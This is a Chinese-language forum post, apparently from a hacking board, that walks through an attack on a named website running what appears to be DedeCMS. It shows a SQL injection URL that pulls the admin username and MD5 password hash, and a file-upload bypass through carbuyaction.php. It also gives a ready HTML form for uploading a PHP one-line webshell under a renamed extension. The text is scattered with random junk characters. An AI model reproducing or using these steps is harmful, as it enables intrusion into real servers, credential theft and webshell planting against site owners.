①注入漏洞。! u1 [9 J( C3 v+ i. o8 K. @; G
这站 http://www.political-security.com/9 Y6 @# \& U3 U: J2 l
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,/ q3 S. A& t. s$ a+ g
www.political-security.com/data/mysql_error_trace.inc 爆后台6 U6 I! N) w* c+ A# o
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
@/ n+ s' M6 z6 c2 i C然后写上语句
) c) K) r! [8 K, p+ n, k查看管理员帐号
% o: W: w. m; L( Z. h7 fhttp://www.political-security.co ... &membergroup=@`2 p) {9 M1 B" T+ u, k
' Q8 d" x) v3 L
admin
, h9 u, u! c8 H- z8 p8 V% u
% V3 h" B& z; V查看管理员密码# m/ k. n8 }, E9 P9 Y
http://www.political-security.co ... &membergroup=@`$ G+ N) l( _; ^/ F0 O- F$ A
3 b! a/ A/ B! `! \% e% j
8d29b1ef9f8c5a5af429' Z( { c# s, Y9 s- J3 C
8 B' q. y2 o, k+ a J查看管理员密码! E0 {% U$ e3 F' }" _
" U! i5 y, c9 R" a, @得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5; p/ a, X6 w' u: @& Y
$ H% c0 [3 J! t u( e7 l, ^8d2+ Q& z$ }9 y! }# |! P
9b1ef9f8c5a5af422 \) p* m3 d- U& l- C
9
0 d0 K$ i8 n7 p- ~+ I0 s* E2 k/ |# l) a+ R) i, m; U
cmd5没解出来 只好测试第二个方法1 [3 \+ y0 m1 b3 s
_5 K; z) h* W/ X' u; v0 A6 ?* I c9 b9 ]4 D7 E
②上传漏洞:
: N& N" n& r' |" r2 G
2 r# d& g* A; ]6 d) S只要登陆会员中心,然后访问页面链接
3 n, ^6 j- P$ ~. w# \“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”) x6 |, v& U, q
6 i5 a! E( }6 ?& D* V如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
1 l+ W% Q" L* M/ O1 O. f1 u/ U) k7 z- c1 e+ d$ J2 a* K, @- Y
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm& I9 N& R1 l+ |2 w% j0 A3 f. F# {
* F. I( Q: h3 ?<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>0 k$ W# k* C' I+ V. B
或者
' \' S) p9 \8 }$ x0 V6 a即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对